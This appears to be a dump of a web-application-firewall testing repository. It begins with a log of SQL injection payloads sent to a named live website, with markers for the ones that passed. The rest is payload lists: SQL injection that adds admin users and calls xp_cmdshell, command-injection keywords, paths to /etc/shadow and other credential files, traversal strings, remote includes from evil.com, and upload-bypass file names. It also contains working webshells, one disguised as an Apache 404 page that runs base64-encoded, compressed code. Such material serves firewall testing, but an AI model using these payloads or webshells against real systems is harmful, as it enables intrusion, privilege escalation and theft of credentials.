| [!!] 30 : 200 usecase:1 \WINNT\system32\cmd.exe /c net user paf pafpaf /add';--" 93 | ------------- 94 | http://www.zoosnet.net/default.aspx 95 | [!!] 31 : 200 usecase:1 EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' 96 | ------------- 97 | http://www.zoosnet.net/default.aspx 98 | [OK] 32 : 400 usecase:1 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 99 | ------------- 100 | http://www.zoosnet.net/default.aspx 101 | [!!] 
33 : 200 usecase:1 exec master..xp_dirtree 'c:\winnt\system32\',1,1 102 | ------------- 103 | http://www.zoosnet.net/default.aspx 104 | [OK] 34 : 400 usecase:1 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- 105 | ------------- 106 | http://www.zoosnet.net/default.aspx 107 | [!!] 35 : 200 usecase:1 exec master.dbo.sp_addsrvrolemember test,sysadmin 108 | ------------- 109 | http://www.zoosnet.net/default.aspx 110 | [!!] 36 : 200 usecase:1 GRANT exec On xp_proxiedadata TO public 111 | ------------- 112 | http://www.zoosnet.net/default.aspx 113 | [!!] 37 : 200 usecase:1 Create TABLE biao(id int NULL,name nvarchar(256) null); 114 | ------------- 115 | http://www.zoosnet.net/default.aspx 116 | [!!] 38 : 200 usecase:1 select name from master.dbo.sysdatabases 117 | ------------- 118 | http://www.zoosnet.net/default.aspx 119 | [!!] 39 : 200 usecase:1 SELECT version FROM v$instance; 120 | ------------- 121 | http://www.zoosnet.net/default.aspx 122 | [!!] 40 : 200 usecase:1 SELECT @@version 123 | ------------- 124 | http://www.zoosnet.net/default.aspx 125 | [!!] 41 : 200 usecase:1 SELECT /*comment*/1 126 | ------------- 127 | http://www.zoosnet.net/default.aspx 128 | [!!] 42 : 200 usecase:1 SELECT user_name(); 129 | ------------- 130 | http://www.zoosnet.net/default.aspx 131 | [!!] 43 : 200 usecase:1 SELECT system_user; 132 | ------------- 133 | http://www.zoosnet.net/default.aspx 134 | [!!] 44 : 200 usecase:1 SELECT DB_NAME() 135 | ------------- 136 | http://www.zoosnet.net/default.aspx 137 | [!!] 45 : 200 usecase:1 SELECT char(0x41) 138 | ------------- 139 | http://www.zoosnet.net/default.aspx 140 | [!!] 46 : 200 usecase:1 IF (1=1) SELECT 1 ELSE SELECT 2 141 | ------------- 142 | http://www.zoosnet.net/default.aspx 143 | [!!] 
47 : 200 usecase:1 SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END 144 | ------------- 145 | http://www.zoosnet.net/default.aspx 146 | [OK] 48 : 400 usecase:1 WAITFOR DELAY '0:0:5' 147 | ------------- 148 | http://www.zoosnet.net/default.aspx 149 | [OK] 49 : 400 usecase:1 declare @host varchar(800); 150 | ------------- 151 | http://www.zoosnet.net/default.aspx 152 | [!!] 50 : 200 usecase:1 SELECT HOST_NAME() 153 | ------------- 154 | http://www.zoosnet.net/default.aspx 155 | [OK] 51 : 400 usecase:1 UNION ALL SELECT LOAD_FILE('/etc/passwd') 156 | ------------- 157 | http://www.zoosnet.net/default.aspx 158 | [!!] 52 : 200 usecase:1 GRANT ALL PRIVILEGES ON *.* TO test1@'%'; 159 | ------------- 160 | http://www.zoosnet.net/default.aspx 161 | [!!] 53 : 200 usecase:1 SELECT @@datadir; 162 | ------------- 163 | http://www.zoosnet.net/default.aspx 164 | [!!] 54 : 200 usecase:1 SELECT cast('1' AS unsigned integer); 165 | ------------- 166 | http://www.zoosnet.net/default.aspx 167 | [!!] 55 : 200 usecase:1 or 2=2%2D%2D 168 | ------------- 169 | http://www.zoosnet.net/default.aspx 170 | [!!] 56 : 200 usecase:1 /**/and/**/1=1 171 | ------------- 172 | http://www.zoosnet.net/default.aspx 173 | [!!] 57 : 200 usecase:1 %20a%%%nd%201=1 174 | ------------- 175 | http://www.zoosnet.net/default.aspx 176 | [!!] 58 : 200 usecase:1 %0aand%0a1=1 177 | ------------- 178 | http://www.zoosnet.net/default.aspx 179 | [!!] 59 : 200 usecase:1 a%n%d 1=1 180 | ------------- 181 | http://www.zoosnet.net/default.aspx 182 | [!!] 60 : 200 usecase:1 %01and%011=1 183 | ------------- 184 | http://www.zoosnet.net/default.aspx 185 | [!!] 61 : 200 usecase:1 and (se%%lect top 1 password from [admin])=0 186 | ------------- 187 | http://www.zoosnet.net/default.aspx 188 | [!!] 
62 : 200 usecase:1 /*!union*/ /*!select*/ user,password /*!from*/ mysql.user 189 | ------------- 190 | http://www.zoosnet.net/default.aspx 191 | [OK] 63 : 400 usecase:1 /**/union/**/select/**/1,load_file(0x633A5C626F6F742E696E69),3/* 192 | ------------- 193 | http://www.zoosnet.net/default.aspx 194 | [!!] 64 : 200 usecase:1 ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1 195 | ------------- 196 | http://www.zoosnet.net/default.aspx 197 | [!!] 65 : 200 usecase:1 %61nd 1=1 198 | ------------- 199 | http://www.zoosnet.net/default.aspx 200 | [!!] 66 : 200 usecase:1 &id=union&id=select&id=1,2&id=from%20mysql.user 201 | ------------- 202 | http://www.zoosnet.net/default.aspx 203 | [OK] 67 : 400 usecase:1 ?id=1 union select 1&id=pass from admin 204 | -------------------------------------------------------------------------------- /usecase/commandi.usecase: -------------------------------------------------------------------------------- 1 | ifconfig 2 | netstat 3 | hostname 4 | host 5 | nslookup 6 | nc -l 7 | ping 192.168.16.16 8 | groupadd -o 9 | groupdel 10 | groupmod -o 11 | useradd -o 12 | userdel 13 | usermod -o 14 | passwd 15 | more 16 | less 17 | |grep 18 | sed 19 | echo "xxx"> 20 | shutdown -h now 21 | reboot 22 | logout 23 | net user 24 | net localgroup 25 | net start 26 | net stop 27 | copy 28 | move 29 | fgets 30 | file_get_contents 31 | file_put_contents 32 | call_user_func 33 | gzcompress 34 | gzencode 35 | gzread 36 | session_start 37 | scandir 38 | -------------------------------------------------------------------------------- /usecase/download.usecase: -------------------------------------------------------------------------------- 1 | /usr/local/resin/conf/resin.conf 2 | /etc/my.cnf 3 | /my.ini/my.cnf 4 | /etc/vsftpd/vsftpd.conf 5 | /etc/squid/squid.conf 6 | /etc/samba/smb.conf 7 | /etc/httpd/conf/httpd.conf 8 | /etc/redhat-release 9 | /etc/passwd 10 | /etc/rc.d 11 | /root/.bash_profile 12 | /root/.bashrc 13 | /etc/xinetd.d/tftp 14 | 
/etc/ftpusers 15 | /etc/ftpconversions 16 | /etc/ftp-groups 17 | /etc/ftpphosts 18 | /etc/ftpaccess 19 | /etc/exports 20 | /etc/vsftpd/vsftpd.conf  21 | /etc/crontab 22 | boot.ini 23 | test.mdb 24 | test.myd 25 | test.myi 26 | test.frm 27 | test.sql 28 | test.mdf 29 | test.ndf 30 | test.ldf 31 | test.bak 32 | test.log 33 | Global.asa 34 | test.inc 35 | Web_Data_User.config 36 | web.config 37 | app.config 38 | 39 | -------------------------------------------------------------------------------- /usecase/lfi.usecase: -------------------------------------------------------------------------------- 1 | ../ 2 | ../../ 3 | %2e%2e%2f%2e%2e%2f 4 | %2e%2e/%2e%2e/ 5 | ..\..\ 6 | %2e%2e%5c%2e%2e%5c 7 | %252e%252e%252f%252e%252e%252f 8 | ..%c0%af..%c0%af 9 | ..%c1%9c..%c1%9c 10 | c:\windows\ 11 | .svn 12 | /etc/passwd 13 | /etc/httpd/conf/httpd.conf 14 | /etc/sysconfig/network-scripts/ifcfg-eth0 15 | /etc/my.cnf 16 | /etc/redhat-release 17 | /etc/shadow 18 | /usr/local/webserver/nginx/conf/nginx.conf 19 | /usr/local/nginx/conf/nginx.conf 20 | /opt/nginx/conf/nginx.conf 21 | /etc/nginx/nginx.conf 22 | /usr/local/nginx/conf/proxy.conf 23 | php://input 24 | php://filter 25 | http://evil.com/evil.js 26 | ftp://evil.com/evil.js 27 | https://evil.com/evil.js 28 | http://220.190.11.16/evil.js -------------------------------------------------------------------------------- /usecase/spider.usecase: -------------------------------------------------------------------------------- 1 | Yahoo Slurp 2 | Yahoo! 
Slurp China 3 | YahooSeeker-Testing 4 | Yahoo-Blogs 5 | Yahoo-MMCrawler 6 | Y!J Yahoo Japan 7 | yahoo contentmatch crawler 8 | Yahoo Feed Seeker 9 | Mediapartners-Google 10 | Googlebot 11 | Google AdSense 12 | adsbot-google 13 | Feedfetcher-Google 14 | googlefriendconnect 15 | googlebot-mobile 16 | googlebot-image 17 | Google Desktop Search 18 | BaiDuSpider 19 | baiducustomer 20 | baidu-thumbnail 21 | baiduspider-mobile-gate 22 | Baiduspider-mobile 23 | Baiduspider-video 24 | Baiduspider-news 25 | baidu-transcoder 26 | MSNBot 27 | msnbot-media 28 | msrabot 29 | msnbot-products 30 | msnbot-academic 31 | msnbot-newsblogs 32 | bingbot 33 | microsoft-atl-native 34 | SandCrawler (Microsoft) 35 | iaskspider 36 | Sina Iask Spider 37 | qihoobot 38 | 360Spider 39 | Sosospider 40 | Sosoimagespider 41 | Sosoblogspider 42 | youdaobot 43 | yodaobot-image 44 | yodaobot-reader 45 | YoudaoFeedFetcher 46 | Outfoxbot 47 | YoudaoFeedFetcher 48 | Sogou Spider 49 | sogou web robot 50 | YisouSpider 51 | EtaoSpider 52 | JikeSpider 53 | EasouSpider 54 | ia_archiver 55 | Scooter 56 | lycos_spider_(t-rex) 57 | fast-webcrawler 58 | slurp 59 | Adminrtspider 60 | lanshanbot 61 | GouGou 62 | ask jeeves/teoma 63 | ask 64 | GigaBot 65 | eApolloBot 66 | P.Arthur 67 | InfoPath 68 | DigExt 69 | SurveyBot 70 | Lilina 71 | Yandex Bot 72 | TurnitinBot 73 | WebGather 74 | Tagyu Agent 75 | HTTrack off-line browser 76 | Harvest 77 | 50.nu 78 | 79 | -------------------------------------------------------------------------------- /usecase/sqli.usecase: -------------------------------------------------------------------------------- 1 | 1 and 1=1 2 | 1 or 'ab'='ab 3 | 1 and ord(mid(version(),1,1))>51/* 4 | 1 order by 10-- 5 | 1 ;select BENCHMARK(100000,SHA1('true')), false);-- 6 | 1 having 1=1 7 | 1 GROUP BY colume_got having 1=1 8 | 1 ;create table cmd(a text) 9 | 1 "UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%28admin%29%29 10 | 1 =-9%0Aunion%0Aselect 1,2,3,4" 11 | 1 
null union all select 1,user(),3,4,5/* 12 | 1 ;insert into user(username,password) values('xxxx',' xxxx'),('dddd','dddd')/* '); 13 | 1 14 | 1 and 1=(Select IS_MEMBER('db_owner')) 15 | 1 And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- 16 | 1 and 1= (Select HAS_DBACCESS('master')) 17 | 1 And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 18 | 1 and char(124)%2Buser%2Bchar(124)=0 19 | 1 and user>0 20 | 1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 21 | 1 And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 22 | 1 and exists (select * from sysobjects);-- 23 | 1 ;declare @d int;-- 24 | 1 ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- 25 | 1 select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 26 | 1 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 27 | 1 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell 28 | 1 ("cmd.exe /c net user admin admin1234 /add")') 29 | 1 ";DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C: 30 | 1 \WINNT\system32\cmd.exe /c net user paf pafpaf /add';--" 31 | 1 EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' 32 | 1 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 33 | 1 exec master..xp_dirtree 'c:\winnt\system32\',1,1 34 | 1 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- 35 | 1 exec master.dbo.sp_addsrvrolemember test,sysadmin 36 | 1 GRANT exec On xp_proxiedadata TO public 37 | 1 Create TABLE biao(id int NULL,name nvarchar(256) null); 38 | 1 select name from master.dbo.sysdatabases 39 | 1 SELECT version FROM v$instance; 40 | 1 SELECT @@version 41 | 1 SELECT /*comment*/1 42 | 1 SELECT user_name(); 43 | 1 
SELECT system_user; 44 | 1 SELECT DB_NAME() 45 | 1 SELECT char(0x41) 46 | 1 IF (1=1) SELECT 1 ELSE SELECT 2 47 | 1 SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END 48 | 1 WAITFOR DELAY '0:0:5' 49 | 1 declare @host varchar(800); 50 | 1 SELECT HOST_NAME() 51 | 1 UNION ALL SELECT LOAD_FILE('/etc/passwd') 52 | 1 GRANT ALL PRIVILEGES ON *.* TO test1@'%'; 53 | 1 SELECT @@datadir; 54 | 1 SELECT cast('1' AS unsigned integer); 55 | 1 or 2=2%2D%2D 56 | 1 /**/and/**/1=1 57 | 1 %20a%%%nd%201=1 58 | 1 %0aand%0a1=1 59 | 1 a%n%d 1=1 60 | 1 %01and%011=1 61 | 1 and (se%%lect top 1 password from [admin])=0 62 | 1 /*!union*/ /*!select*/ user,password /*!from*/ mysql.user 63 | 1 /**/union/**/select/**/1,load_file(0x633A5C626F6F742E696E69),3/* 64 | 1 ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1 65 | 1 %61nd 1=1 66 | 1 &id=union&id=select&id=1,2&id=from%20mysql.user 67 | 1 ?id=1 union select 1&id=pass from admin 68 | -------------------------------------------------------------------------------- /usecase/upload_content/a.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /usecase/upload_content/b.asp: -------------------------------------------------------------------------------- 1 | <%eval request("istar")%> -------------------------------------------------------------------------------- /usecase/upload_content/c.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 2 | -------------------------------------------------------------------------------- /usecase/upload_content/webshell/404.php: -------------------------------------------------------------------------------- 1 | 404 Not Found 21 |

Not Found

22 |

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

23 |
24 |
Apache Server at ".$_SERVER["HTTP_HOST"]." Port 80
25 | 28 |
29 |
30 | 31 |
32 | "); 33 | } 34 | } 35 | $code = "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"; 36 | eval(gzinflate(base64_decode($code))); 37 | ?>div> 38 | -------------------------------------------------------------------------------- /usecase/upload_content/webshell/phpspy.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hongxs/WAF-Tester2/b2535eb2dd94ae9a093cd9131cd2c510e9b5f30d/usecase/upload_content/webshell/phpspy.php -------------------------------------------------------------------------------- /usecase/upload_ext.usecase: -------------------------------------------------------------------------------- 1 | test.asp 2 | test.asa 3 | test.cer 4 | test.jsp 5 | test.php 6 | test.php3 7 | test.PhP 8 | test.php.xx2.xxx3 9 | test.asp;.jpg 10 | evil.asp0x00.jpg 11 | --------------------------------------------------------------------------------